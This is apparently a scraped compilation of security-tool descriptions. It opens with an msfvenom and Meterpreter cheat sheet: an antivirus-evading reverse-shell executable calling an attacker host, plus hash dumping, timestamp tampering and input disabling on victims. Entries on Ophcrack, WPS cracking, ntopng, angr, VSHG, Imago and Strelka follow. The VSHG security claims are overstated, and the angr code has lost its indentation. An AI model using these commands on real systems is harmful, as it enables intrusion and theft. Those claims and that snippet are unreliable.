The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeIterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
Example
Encode a payload 5 times using the shikata_ga_nai encoder and output as an executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker's) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
Process Commands:
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate: Jump to a given destination process ID
  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on.

Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table

Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
screenshot: Save as an image a screenshot of the target machine.

Additional Modules:
use [module]: Load the specified module
Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j

List all current jobs (usually exploit listeners):
msf > jobs -l

Kill a job:
msf > jobs -k [JobID]

Multiple Sessions:

List all backgrounded sessions:
msf > sessions -l

Interact with a backgrounded session:
msf > sessions -i [SessionID]

Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background

Routing Through Sessions:
All modules (exploits/post/aux) run against the target subnet will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]


Ophcrack - A Windows Password Cracker Based On Rainbow Tables


Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Features:
  • Runs on Windows, Linux/Unix, Mac OS X, ...
  • Cracks LM and NTLM hashes.
  • Free tables available for Windows XP and Vista/7.
  • Brute-force module for simple passwords.
  • Audit mode and CSV export.
  • Real-time graphs to analyze the passwords.
  • LiveCD available to simplify the cracking.
  • Dumps and loads hashes from encrypted SAM recovered from a Windows partition.
  • Free and open source software (GPL).

HT-WPS Breaker - High Touch WPS Breaker


High Touch WPS Breaker [HT-WB] is a small tool based on the bash scripting language. It can help you extract the WPS PIN of many vulnerable routers and obtain the password. Note that HT-WPS Breaker uses the following tools in its process:
  • "Pixiewps"
  • "Reaver"
  • "Bully"
  • "Aircrack Suite"
  • "Wash"

Here is how to make the script work:
  • Copy HT-WPS-Breaker.zip to the Desktop.
  • Open the terminal.
  • Type the following commands:
    • cd Desktop
    • unzip HT-WPS-Breaker.zip
    • cd HT-WPS-Breaker
    • chmod +x HT-WB.sh
    • ./HT-WB.sh or bash HT-WB.sh


Ntopng - Web-based Traffic And Security Network Traffic Monitoring


ntopng is the next generation version of the original ntop, a network traffic probe that monitors network usage. ntopng is based on libpcap and has been written in a portable way in order to run on virtually every Unix platform, macOS and Windows as well.
ntopng – yes, it’s all lowercase – provides an intuitive, encrypted web user interface for the exploration of realtime and historical traffic information.

Main Features
  • Sort network traffic according to many criteria including IP address, port, L7 protocol, throughput, Autonomous Systems (ASs)
  • Show realtime network traffic and active hosts
  • Produce long-term reports for several network metrics including throughput and application protocols
  • Top talkers (senders/receivers), top ASs, top L7 applications
  • Monitor and report live throughput, network and application latencies, Round Trip Time (RTT), TCP statistics (retransmissions, out of order packets, packet loss), and bytes and packets transmitted
  • Store on disk persistent traffic statistics to allow future explorations and post-mortem analyses
  • Geolocate and overlay hosts in a geographical map
  • Discover application protocols (Facebook, YouTube, BitTorrent, etc) by leveraging nDPI, ntop's Deep Packet Inspection (DPI) technology
  • Characterise HTTP traffic by leveraging characterisation services provided by Google and HTTP Blacklist.
  • Analyse IP traffic and sort it according to the source/destination.
  • Report IP protocol usage sorted by protocol type
  • Produce HTML5/AJAX network traffic statistics.
  • Full support for IPv4 and IPv6
  • Full Layer-2 support (including ARP statistics)
  • GTP/GRE detunnelling
  • Support for MySQL, ElasticSearch and LogStash export of monitored data
  • Interactive historical exploration of monitored data exported to MySQL
  • Alerts engine to capture anomalous and suspicious hosts
  • SNMP v1/v2c support and continuous monitoring of SNMP devices

Angr - A Powerful And User-Friendly Binary Analysis Platform



angr is a platform-agnostic binary analysis framework. It is brought to you by the Computer Security Lab at UC Santa Barbara, SEFCOM at Arizona State University, their associated CTF team, Shellphish, the open source community, and @rhelmot.

What?
angr is a suite of Python 3 libraries that let you load a binary and do a lot of cool things to it:
  • Disassembly and intermediate-representation lifting
  • Program instrumentation
  • Symbolic execution
  • Control-flow analysis
  • Data-dependency analysis
  • Value-set analysis (VSA)
  • Decompilation
The most common angr operation is loading a binary: p = angr.Project('/bin/bash'). If you do this in an enhanced REPL like IPython, you can use tab-autocomplete to browse the top-level-accessible methods and their docstrings.
The short version of "how to install angr" is mkvirtualenv --python=$(which python3) angr && python -m pip install angr.

Example
angr does a lot of binary analysis stuff. To get you started, here's a simple example of using symbolic execution to get a flag in a CTF challenge.
import angr

project = angr.Project("angr-doc/examples/defcamp_r100/r100", auto_load_libs=False)

@project.hook(0x400844)
def print_flag(state):
print("FLAG SHOULD BE:", state.posix.dumps(0))
project.terminate_execution()

project.execute()
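
Hooking works well when the success address is known. As a complementary illustration (not part of the official example), here is a minimal sketch that drives a simulation manager toward a target basic block instead; the find/avoid addresses are placeholders you would take from your own binary:

import angr

proj = angr.Project("angr-doc/examples/defcamp_r100/r100", auto_load_libs=False)
state = proj.factory.entry_state()
simgr = proj.factory.simulation_manager(state)

# Explore paths until one reaches the "success" block, pruning "failure" paths.
# 0x400844 / 0x400855 are placeholder addresses for this sketch.
simgr.explore(find=0x400844, avoid=0x400855)

if simgr.found:
    print("FLAG SHOULD BE:", simgr.found[0].posix.dumps(0))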


VSHG - Hardware resistance & enhanced security for GnuPG


VSHG aims to provide memory/hardware-resistant reinforcement of GnuPG's standard s2k key-derivation function plus a simplified interface for symmetric encryption.

About VSHG
VSHG (Very Secure Hash Generator) is a standalone addon for GnuPG (GNU Privacy Guard). It is written as a shell script and is designed around the Unix/Linux filesystem and commands. VSHG uses the sha384 and Argon2 hash functions for the password and AES-256-CFB + CAST5-128-CFB in cascade for the final encryption.
It also uses a standard sha384 iteration count of 800 iterations, plus 15 and 500 iterations for Argon2i and Argon2d.
It uses true-random 12-byte salts, so even if your passphrase is very weak, it will be reinforced and you don't have to worry about that anymore.
VSHG uses the last hash of the iteration as the session key for GnuPG. It also provides an autodetection function for each file, so you don't have to remember either the salt or the iteration count.
Optionally you can use a key-file as an authentication method.

Why is VSHG so secure ?
VSHG uses a true random salt for each encrypted file, so your passphrase always gains a minimum of 12 bytes in strength. You could even use the same password twice for different files. What makes VSHG so secure are the iterations: 800 iterations mean the string is hashed 800 times, each round over the previous output. The more iterations, the more security there is. Even with the correct passphrase, decryption fails without the correct number of iterations.
VSHG uses some of the most advanced memory-hard key derivation functions, namely Argon2i and Argon2d. The already iterated key is passed through Argon2 a total of 515 times, ensuring resistance against the biggest threats to key derivation functions: graphics processing units, field-programmable gate arrays and application-specific integrated circuits (GPU, FPGA, ASIC).
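
To make the iteration idea concrete, here is a minimal Python sketch of salted, iterated sha384 hashing (illustrative only -- VSHG itself is a shell script that additionally runs the result through Argon2 and GnuPG):

import hashlib
import os

def iterated_sha384(passphrase: bytes, salt: bytes, iterations: int = 800) -> bytes:
    # Hash the salted passphrase once, then keep re-hashing the previous digest.
    digest = hashlib.sha384(salt + passphrase).digest()
    for _ in range(iterations - 1):
        digest = hashlib.sha384(digest).digest()
    return digest

salt = os.urandom(12)   # a true-random 12-byte salt, as described above
session_key = iterated_sha384(b"my weak passphrase", salt)
print(session_key.hex())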
The actual encryption is performed with the highest level of security possible in GnuPG.
-The string-to-key (s2k) hash algo (which is the KDF of GnuPG) was reinforced from sha1 to sha512.
-The s2k mode was set to 3, which means that an 8-byte salt is applied and then iterated.
-The s2k count was set to 65011712, which is the highest possible number of iterations.
-The s2k cipher algo was set to AES256 and CAST5 in cascade.
The AES-256 encrypted file is securely deleted so that only the AES256(CAST5()) encrypted file is put out.

Why should I use VSHG ?
  • It is easier to use than GnuPG core.
  • Can encrypt folders by turning them into Zip files.
  • Someone that doesn't have VSHG does not really have a chance of cracking the password.
  • True random 12-byte salt
  • Choosable iteration count.
  • Choosable salt.
  • Choosable keyfile.
  • True random keyfile.
  • Very good resistance to side-channel attacks (e.g. timing attacks).
  • Very resistant towards GPU-based attacks
  • Can guarantee security even with relatively weak passwords (> 5 characters) (if you have enough iterations)
  • Autodetection of salt + iteration count for each file.
  • Military-standard AES-256 encryption + the gpg standard CAST5 encryption.
  • Uses the gpg s2k mode 3 + sha512 with the maximum count of 65011712.
  • Erases the original file securely.

Download & Installation
  • Download as tarball
sudo wget https://github.com/RichardRMatthews/VSHG/archive/1.4.tar.gz
Or clone the repository
git clone https://github.com/RichardRMatthews/VSHG.git
  • Compile it yourself
sudo git clone https://github.com/neurobin/shc.git
cd shc
sudo ./shc -f -r /etc/VSHG/executable/src/VSHG_1.4.sh
sudo gcc /etc/VSHG/executable/src/VSHG_1.4.sh.x.c -o /usr/bin/VSHG
sudo VSHG
  • Run
sudo tar -xf VSHG-1.4.tar.gz
sudo chmod +x VSHG_1.4.sh
sudo ./VSHG_1.4.sh


Imago Forensics - Imago Is A Python Tool That Extract Digital Evidences From Images


Imago is a python tool that extracts digital evidence from images recursively. This tool is useful throughout a digital forensic investigation: if you need to extract digital evidence and you have a lot of images, this tool lets you compare them easily. Imago allows you to extract the evidence into a CSV file or into a sqlite database. If GPS coordinates are present in a JPEG's EXIF data, Imago can extract the longitude and latitude, convert them to degrees, and retrieve relevant information such as city, country and ZIP code. Imago also offers the possibility to calculate Error Level Analysis and to detect nudity; these functionalities are in BETA.

Setup

Setup via pip
  1. Install imago:
$ pip install imago
  2. Once installed, a new binary should be available:
$ imago 
It should then output Imago's banner.

Requirements:
python 2.7
exifread 2.1.2
python-magic 0.4.15
argparse 1.4.0
pillow 5.2.0
nudepy 0.4
imagehash 4.0
geopy 1.16.0

Usage
usage: imago.py [-h] -i INPUT [-x] [-g] [-e] [-n] [-d {md5,sha256,sha512,all}]
[-p {ahash,phash,dhash,whash,all}] [-o OUTPUT] [-s]
[-t {jpeg,tiff}]

optional arguments:
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input directory path
-x, --exif Extract exif metadata
-g, --gps Extract, parse and convert to coordinates, GPS exif
metadata from images (if any)It works only with JPEG.
-e, --ela Extract, Error Level Analysis image,It works only with
JPEG. *BETA*
-n, --nude Detect Nudity, It works only with JPEG, *BETA*
-d {md5,sha256,sha512,all}, --digest {md5,sha256,sha512,all}
Calculate hash digest
-p {ahash,phash,dhash,whash,all}, --percentualhash {ahash,phash,dhash,whash,all}
Calculate perceptual image hashing
-o OUTPUT, --output OUTPUT
Output directory path
-s, --sqli Keep SQLite file after the computation
-t {jpeg,tiff}, --type {jpeg,tiff}
Select the image type; this flag can be jpeg or tiff. If
this argument is not provided, imago will process
all the image types (i.e. JPEG, TIFF)


The only required argument is -i, which is the base directory from which imago will start to search for image files. You should also provide at least one type of extraction (i.e. exif, data, gps, digest).

Example:
$ imago -i /home/solvent/cases/c23/DCIM/ -o /home/solvent/cases/c23/ -x -s -t jpeg -d all
Where:
  • -i path: the base directory where imago will search for files
  • -o path: the output directory where imago will save the CSV file with the extracted metadata
  • -x: imago will extract EXIF metadata.
  • -s: the temporary SQLite database will not be deleted after the processing.
  • -t jpeg: imago will search only for jpeg images.
  • -d all: imago will calculate md5, sha256, sha512 for the jpeg images (a short Python sketch of these hash options follows below).
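
As a rough sketch of what the digest and perceptual-hash options compute, the hashlib, Pillow and imagehash packages listed in the requirements can be used directly (the file path below is a hypothetical example):

import hashlib

import imagehash
from PIL import Image

path = "/home/solvent/cases/c23/DCIM/IMG_0001.jpg"   # hypothetical example file

# Cryptographic digests (the -d option)
data = open(path, "rb").read()
print("md5    ", hashlib.md5(data).hexdigest())
print("sha256 ", hashlib.sha256(data).hexdigest())
print("sha512 ", hashlib.sha512(data).hexdigest())

# Perceptual hashes (the -p option): similar-looking images produce similar hashes
img = Image.open(path)
print("ahash  ", imagehash.average_hash(img))
print("phash  ", imagehash.phash(img))
print("dhash  ", imagehash.dhash(img))
print("whash  ", imagehash.whash(img))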

Features:
Functionality                      Status
Recursive directory navigation     ✔
file mtime (UTC)                   ✔
file ctime (UTC)                   ✔
file atime (UTC)                   ✔
file size (bytes)                  ✔
MIME type                          ✔
Exif support                       ✔
CSV export                         ✔
Sqlite export                      ✔
md5, sha256, sha512                ✔
Error Level Analysis               ✔ BETA
Full GPS support                   ✔
Nudity detection                   ✔ BETA
Perceptual Image Hashing           ✔
aHash                              ✔
pHash                              ✔
dHash                              ✔
wHash                              ✔





Strelka - Scanning Files At Scale With Python And ZeroMQ


Strelka is a real-time file scanning system used for threat hunting, threat detection, and incident response. Based on the design established by Lockheed Martin's Laika BOSS and similar projects (see: related projects), Strelka's purpose is to perform file extraction and metadata collection at huge scale.
Strelka differs from its sibling projects in a few significant ways:
  • Codebase is Python 3 (minimum supported version is 3.6)
  • Designed for non-interactive, distributed systems (network security monitoring sensors, live response scripts, disk/memory extraction, etc.)
  • Supports direct and remote file requests (Amazon S3, Google Cloud Storage, etc.) with optional encryption and authentication
  • Uses widely supported networking, messaging, and data libraries/formats (ZeroMQ, protocol buffers, YAML, JSON)
  • Built-in scan result logging and log management (compatible with Filebeat/ElasticStack, Splunk, etc.)

Frequently Asked Questions

"Who is Strelka?"
Strelka is one of the second generation Soviet space dogs to achieve orbital spaceflight -- the name is an homage to Lockheed Martin's Laika BOSS, one of the first public projects of this type and the project on which Strelka's core design is based.

"Why would I want a file scanning system?"
File metadata is an additional pillar of data (alongside network, endpoint, authentication, and cloud) that is effective in enabling threat hunting, threat detection, and incident response and can help event analysts and incident responders bridge visibility gaps in their environment. This type of system is especially useful for identifying threat actors during KC3 and KC7. For examples of what Strelka can do, please read the use cases.

"Should I switch from my current file scanning system to Strelka?"
It depends -- we recommend reviewing the features of each and choosing the most appropriate tool for your needs. We believe the most significant motivating factors for switching to Strelka are:

"Are Strelka's scanners compatible with Laika BOSS, File Scanning Framework, or Assemblyline?"
Due to differences in design, Strelka's scanners are not directly compatible with Laika BOSS, File Scanning Framework, or Assemblyline. With some effort, most scanners can likely be ported to the other projects.

"Is Strelka an intrusion detection system (IDS)?"
Strelka shouldn't be thought of as an IDS, but it can be used for threat detection through YARA rule matching and downstream metadata interpretation. Strelka's design follows the philosophy established by other popular metadata collection systems (Bro, Sysmon, Volatility, etc.): it extracts data and leaves the decision-making up to the user.

"Does it work at scale?"
Everyone has their own definition of "at scale," but we have been using Strelka and systems like it to scan up to 100 million files each day for over a year and have never reached a point where the system could not scale to our needs -- as file volume and diversity increases, horizontally scaling the system should allow you to scan any number of files.

"Doesn't this use a lot of bandwidth?"
Yep! Strelka isn't designed to operate in limited bandwidth environments, but we have experimented with solutions to this and there are tricks you can use to reduce bandwidth. These are what we've found most successful:
  • Reduce the total volume of files sent to Strelka
  • Use a tracking system to only send unique files to Strelka (networked Redis servers are especially useful for this)
  • Use traffic control (tc) to shape connections to Strelka

"Should I run my Strelka cluster on my Bro/Suricata network sensor?"
No! Strelka clusters run CPU-intensive processes that will negatively impact system-critical applications like Bro and Suricata. If you want to integrate a network sensor with Strelka, then use strelka_dirstream.py. This utility is capable of sending millions of files per day from a single network sensor to a Strelka cluster without impacting system-critical applications.

"I have other questions!"
Please file an issue or contact the project team at TTS-CFC-OpenSource@target.com. The project lead can also be reached on Twitter at @jshlbrd.

Installation
The recommended operating system for Strelka is Ubuntu 18.04 LTS (Bionic Beaver) -- it may work with earlier versions of Ubuntu if the appropriate packages are installed. We recommend using the Docker container for production deployments and welcome pull requests that add instructions for installing on other operating systems.

Ubuntu 18.04 LTS
  1. Update packages and install build packages
apt-get update && apt-get install --no-install-recommends automake build-essential curl gcc git libtool make python3-dev python3-pip python3-wheel
  2. Install runtime packages
apt-get install --no-install-recommends antiword libarchive-dev libfuzzy-dev libimage-exiftool-perl libmagic-dev libssl-dev python3-setuptools tesseract-ocr unrar upx jq
  3. Install pip3 packages
    pip3 install beautifulsoup4 boltons boto3 gevent google-cloud-storage html5lib inflection interruptingcow jsbeautifier libarchive-c lxml git+https://github.com/aaronst/macholibre.git olefile oletools pdfminer.six pefile pgpdump3 protobuf pyelftools pygments pyjsparser pylzma git+https://github.com/jshlbrd/pyopenssl.git python-docx git+https://github.com/jshlbrd/python-entropy.git python-keystoneclient python-magic python-swiftclient pyyaml pyzmq rarfile requests rpmfile schedule ssdeep tnefparse
  4. Install YARA
curl -OL https://github.com/VirusTotal/yara/archive/v3.8.1.tar.gz
tar -zxvf v3.8.1.tar.gz
cd yara-3.8.1/
./bootstrap.sh
./configure --with-crypto --enable-dotnet --enable-magic
make && make install && make check
echo "/usr/local/lib" >> /etc/ld.so.conf
ldconfig
  5. Install yara-python
curl -OL https://github.com/VirusTotal/yara-python/archive/v3.8.1.tar.gz
tar -zxvf v3.8.1.tar.gz
cd yara-python-3.8.1/
python3 setup.py build --dynamic-linking
python3 setup.py install
  6. Create Strelka directories
    mkdir /var/log/strelka/ && mkdir /opt/strelka/
  7. Clone this repository
    git clone https://github.com/target/strelka.git /opt/strelka/
  8. Compile the Strelka protobuf
    cd /opt/strelka/server/ && protoc --python_out=. strelka.proto
  9. (Optional) Install the Strelka utilities
    cd /opt/strelka/ && python3 setup.py -q build && python3 setup.py -q install && python3 setup.py -q clean --all

Docker
  1. Clone this repository
    git clone https://github.com/target/strelka.git /opt/strelka/
  2. Build the container
    cd /opt/strelka/ && docker build -t strelka .

Quickstart
By default, Strelka is configured to use a minimal "quickstart" deployment that allows users to test the system. This configuration is not recommended for production deployments. Using two Terminal windows, do the following:
Terminal 1:
$ strelka.py
Terminal 2:
$ strelka_user_client.py --broker 127.0.0.1:5558 --path <path to the file to scan>
$ cat /var/log/strelka/*.log | jq .
Terminal 1 runs a Strelka cluster (broker, 4 workers, and log rotation) with debug logging and Terminal 2 is used to send file requests to the cluster and read the scan results.

Deployment

Utilities
Strelka's design as a distributed system creates the need for client-side and server-side utilities. Client-side utilities provide methods for sending file requests to a cluster and server-side utilities provide methods for distributing and scanning files sent to a cluster.

strelka.py
strelka.py is a non-interactive, server-side utility that contains everything needed for running a large-scale, distributed Strelka cluster. This includes:
  • Capability to run servers in any combination of broker/workers
    • Broker distributes file tasks to workers
    • Workers perform file analysis on tasks
  • On-disk scan result logging
    • Configurable log rotation and management
    • Compatible with external log shippers (e.g. Filebeat, Splunk Universal Forwarder, etc.)
  • Supports encryption and authentication for connections between clients and brokers
  • Self-healing child processes (brokers, workers, log management)
This utility is managed with two configuration files: etc/strelka/strelka.yml and etc/strelka/pylogging.ini.
The help page for strelka.py is shown below:
usage: strelka.py [options]

runs Strelka as a distributed cluster.

optional arguments:
-h, --help show this help message and exit
-d, --debug enable debug messages to the console
-c STRELKA_CFG, --strelka-config STRELKA_CFG
path to strelka configuration file
-l LOGGING_INI, --logging-ini LOGGING_INI
path to python logging configuration file

strelka_dirstream.py
strelka_dirstream.py is a non-interactive, client-side utility used for sending files from a directory to a Strelka cluster in near real-time. This utility uses inotify to watch the directory and sends files to the cluster as soon as possible after they are written.
Additionally, for select file sources, this utility can parse metadata embedded in the file's filename and send it to the cluster as external metadata. Bro network sensors are currently the only supported file source, but other application-specific sources can be added.
Using the utility with Bro requires no modification of the Bro source code, but it does require the network sensor to run a Bro script that enables file extraction. We recommend using our stub Bro script (etc/bro/extract-strelka.bro) to extract files. Other extraction scripts will also work, but they will not parse Bro's metadata.
This utility is managed with one configuration file: etc/dirstream/dirstream.yml.
The help page for strelka_dirstream.py is shown below:
usage: strelka_dirstream.py [options]

sends files from a directory to a Strelka cluster in near real-time.

optional arguments:
-h, --help show this help message and exit
-d, --debug enable debug messages to the console
-c DIRSTREAM_CFG, --dirstream-config DIRSTREAM_CFG
path to dirstream configuration file
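
As a simplified illustration of the behaviour described above (the real utility uses inotify for near real-time delivery; this polling sketch only mirrors the file_mtime_delta and meta_separator options from the configuration):

import os
import time

META_SEPARATOR = "S^E^P"   # must match etc/dirstream/dirstream.yml
MTIME_DELTA = 5            # seconds a file must sit unmodified before it is sent

def ready_files(directory):
    # Yield files that have settled, together with any filename-embedded metadata.
    now = time.time()
    for entry in os.scandir(directory):
        if entry.is_file() and now - entry.stat().st_mtime >= MTIME_DELTA:
            metadata = entry.name.split(META_SEPARATOR)
            yield entry.path, metadata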

strelka_user_client.py
strelka_user_client.py is a user-driven, client-side utility that is used for sending ad-hoc file requests to a cluster. This client should be used when file analysis is needed for a specific file or group of files -- it is explicitly designed for users and should not be expected to perform long-lived or fully automated file requests. We recommend using this utility as an example of what is required in building new client utilities.
Using this utility, users can send three types of file requests:
The help page for strelka_user_client.py is shown below:
usage: strelka_user_client.py [options]

sends ad-hoc file requests to a Strelka cluster.

optional arguments:
-h, --help show this help message and exit
-d, --debug enable debug messages to the console
-b BROKER, --broker BROKER
network address and network port of the broker (e.g.
127.0.0.1:5558)
-p PATH, --path PATH path to the file or directory of files to send to the
broker
-l LOCATION, --location LOCATION
JSON representation of a location for the cluster to
retrieve files from
-t TIMEOUT, --timeout TIMEOUT
amount of time (in seconds) to wait until a file
transfer times out
-bpk BROKER_PUBLIC_KEY, --broker-public-key BROKER_PUBLIC_KEY
location of the broker Curve public key certificate
(this option enables curve encryption and must be used
if the broker has curve enabled)
-csk CLIENT_SECRET_KEY, --client-secret-key CLIENT_SECRET_KEY
location of the client Curve secret key certificate
(this option enables curve encryption and must be used
if the broker has curve enabled)
-ug, --use-green determines if PyZMQ green should be used, which can
increase performance at the risk of message loss

generate_curve_certificates.py
generate_curve_certificates.py is a utility used for generating broker and worker Curve certificates. This utility is required for setting up Curve encryption/authentication.
The help page for generate_curve_certificates.py is shown below:
usage: generate_curve_certificates.py [options]

generates curve certificates used by brokers and clients.

optional arguments:
-h, --help show this help message and exit
-p PATH, --path PATH path to store keys in (defaults to current working
directory)
-b, --broker generate curve certificates for a broker
-c, --client generate curve certificates for a client
-cf CLIENT_FILE, --client-file CLIENT_FILE
path to a file containing line-separated list of
clients to generate keys for, useful for creating many
client keys at once

validate_yara.py
validate_yara.py is a utility used for recursively validating a directory of YARA rules files. This can be useful when debugging issues related to the ScanYara scanner.
The help page for validate_yara.py is shown below:
usage: validate_yara.py [options]

validates YARA rules files.

optional arguments:
-h, --help show this help message and exit
-p PATH, --path PATH path to directory containing YARA rules
-e, --error boolean that determines if warnings should cause
errors
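
The same idea can be sketched in a few lines with the yara-python package installed earlier (an illustration of the described behaviour, not the utility's actual source):

import os
import sys

import yara

def validate_rules(path: str, error_on_warning: bool = False) -> bool:
    # Recursively try to compile every file under path and report failures.
    ok = True
    for root, _, files in os.walk(path):
        for name in files:
            rule_path = os.path.join(root, name)
            try:
                yara.compile(filepath=rule_path, error_on_warning=error_on_warning)
            except yara.Error as exc:
                print(f"{rule_path}: {exc}", file=sys.stderr)
                ok = False
    return ok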

Configuration Files
Strelka uses YAML for configuring client-side and server-side utilities. We recommend using the default configurations and modifying the options as needed.

Strelka Configuration (strelka.py)
Strelka's cluster configuration file is stored in etc/strelka/strelka.yml and contains three sections: daemon, remote, and scan.

Daemon Configuration
The daemon configuration contains five sub-sections: processes, network, broker, workers, and logrotate.
The "processes" section controls the processes launched by the daemon. The configuration options are:
  • "run_broker": boolean that determines if the server should run a Strelka broker process (defaults to True)
  • "run_workers": boolean that determines if the server should run Strelka worker processes (defaults to True)
  • "run_logrotate": boolean that determines if the server should run a Strelka log rotation process (defaults to True)
  • "worker_count": number of workers to spawn (defaults to 4)
  • "shutdown_timeout": amount of time (in seconds) that will elapse before the daemon forcibly kills child processes after they have received a shutdown command (defaults to 45 seconds)
The "network" section controls network connectivity. The configuration options are:
  • "broker": network address of the broker (defaults to 127.0.0.1)
  • "request_socket_port": network port used by clients to send file requests to the broker (defaults to 5558)
  • "task_socket_port": network port used by workers to receive tasks from the broker (defaults to 5559)
The "broker" section controls settings related to the broker process. The configuration options are:
  • "poller_timeout": amount of time (in milliseconds) that the broker polls for client requests and worker statuses (defaults to 1000 milliseconds)
  • "broker_secret_key": location of the broker Curve secret key certificate (enables Curve encryption, requires clients to use Curve, defaults to None)
  • "client_public_keys": location of the directory containing client Curve public key certificates (enables Curve encryption and authentication, requires clients to use Curve, defaults to None)
  • "prune_frequency": frequency (in seconds) at which the broker prunes dead workers (defaults to 5 seconds)
  • "prune_delta": delta (in seconds) that must pass since a worker last checked in with the broker before it is considered dead and is pruned (defaults to 10 seconds)
The "workers" section controls settings related to worker processes. The configuration options are:
  • "task_socket_reconnect": amount of time (in milliseconds) that the task socket will attempt to reconnect in the event of TCP disconnection, this will have additional jitter applied (defaults to 100ms plus jitter)
  • "task_socket_reconnect_max": maximum amount of time (in milliseconds) that the task socket will attempt to reconnect in the event of TCP disconnection, this will have additional jitter applied (defaults to 4000ms plus jitter)
  • "poller_timeout": amount of time (in milliseconds) that workers poll for file tasks (defaults to 1000 milliseconds)
  • "file_max": number of files a worker will process before shutting down (defaults to 10000)
  • "time_to_live": amount of time (in minutes) that a worker will run before shutting down (defaults to 30 minutes)
  • "heartbeat_frequency": frequency (in seconds) at which a worker sends a heartbeat to the broker if it has not received any file tasks (defaults to 10 seconds)
  • "log_directory": location where worker scan results are logged to (defaults to /var/log/strelka/)
  • "log_field_case": field case ("camel" or "snake") of the scan result log file data (defaults to camel)
  • "log_bundle_events": boolean that determines if scan results should be bundled in single event as an array or in multiple events (defaults to True)
The "logrotate" section controls settings related to the log rotation process. The configuration options are:
  • "directory": directory to run log rotation on (defaults to /var/log/strelka/)
  • "compression_delta": delta (in minutes) that must pass since a log file was last modified before it is compressed (defaults to 15 minutes)
  • "deletion_delta": delta (in minutes) that must pass since a compressed log file was last modified before it is deleted (defaults to 360 minutes / 6 hours)

Remote Configuration
The remote configuration contains one sub-section: remote.
The "remote" section controls how workers retrieve files from remote file stores. Google Cloud Storage, Amazon S3, OpenStack Swift, and HTTP file stores are supported. All options in this configuration file are optionally read from environment variables if they are "null". The configuration options are:
  • "remote_timeout": amount of time (in seconds) to wait before timing out individual file retrieval
  • "remote_retries": number of times individual file retrieval will be re-attempted in the event of a timeout
  • "google_application_credentials": path to the Google Cloud Storage JSON credentials file
  • "aws_access_key_id": AWS access key ID
  • "aws_secret_access_key": AWS secret access key
  • "aws_default_region": default AWS region
  • "st_auth_version": OpenStack authentication version (defaults to 3)
  • "os_auth_url": OpenStack Keystone authentication URL
  • "os_username": OpenStack username
  • "os_password": OpenStack password
  • "os_cert": OpenStack Keystone certificate
  • "os_cacert": OpenStack Keystone CA Certificate
  • "os_user_domain_name": OpenStack user domain
  • "os_project_name": OpenStack project name
  • "os_project_domain_name": OpenStack project domain
  • "http_basic_user": HTTP Basic authentication username
  • "http_basic_pass": HTTP Basic authentication password
  • "http_verify": path to the CA bundle (file or directory) used for SSL verification (defaults to False, no verification)

Scan Configuration
The scan configuration contains two sub-sections: distribution and scanners.
The "distribution" section controls how files are distributed through the system. The configuration options are:
  • "close_timeout": amount of time (in seconds) that a scanner can spend closing itself (defaults to 30 seconds)
  • "distribution_timeout": amount of time (in seconds) that a single file can be distributed to all scanners (defaults to 1800 seconds / 30 minutes)
  • "scanner_timeout": amount of time (in seconds) that a scanner can spend scanning a file (defaults to 600 seconds / 10 minutes, can be overridden per-scanner)
  • "maximum_depth": maximum depth that child files will be processed by scanners
  • "taste_mime_db": location of the MIME database used to taste files (defaults to None, system default)
  • "taste_yara_rules": location of the directory of YARA files that contains rules used to taste files (defaults to etc/strelka/taste/)
The "scanners" section controls which scanners are assigned to each file; each scanner is assigned by mapping flavors, filenames, and sources from this configuration to the file. "scanners" must always be a dictionary where the key is the scanner name (e.g. ScanZip) and the value is a list of dictionaries containing values for mappings, scanner priority, and scanner options.
Assignment occurs through a system of positive and negative matches: any negative match causes the scanner to skip assignment and at least one positive match causes the scanner to be assigned. A unique identifier (*) is used to assign scanners to all flavors. See File Distribution, Scanners, Flavors, and Tasting for more details on flavors.
Below is a sample configuration that runs the scanner "ScanHeader" on all files and the scanner "ScanRar" on files that match a YARA rule named "rar_file".
scanners:
  'ScanHeader':
    - positive:
        flavors:
          - '*'
      priority: 5
      options:
        length: 50
  'ScanRar':
    - positive:
        flavors:
          - 'rar_file'
      priority: 5
      options:
        limit: 1000
The "positive" dictionary determines which flavors, filenames, and sources cause the scanner to be assigned. Flavors is a list of literal strings while filenames and sources are regular expressions. One positive match will assign the scanner to the file.
Below is a sample configuration that shows how RAR files can be matched against a YARA rule (rar_file), a MIME type (application/x-rar), and a filename (any that end with .rar).
scanners:
  'ScanRar':
    - positive:
        flavors:
          - 'application/x-rar'
          - 'rar_file'
        filename: '\.rar$'
      priority: 5
      options:
        limit: 1000
Each scanner also supports negative matching through the "negative" dictionary. Negative matches occur before positive matches, so any negative match guarantees that the scanner will not be assigned. Similar to positive matches, negative matches support flavors, filenames, and sources.
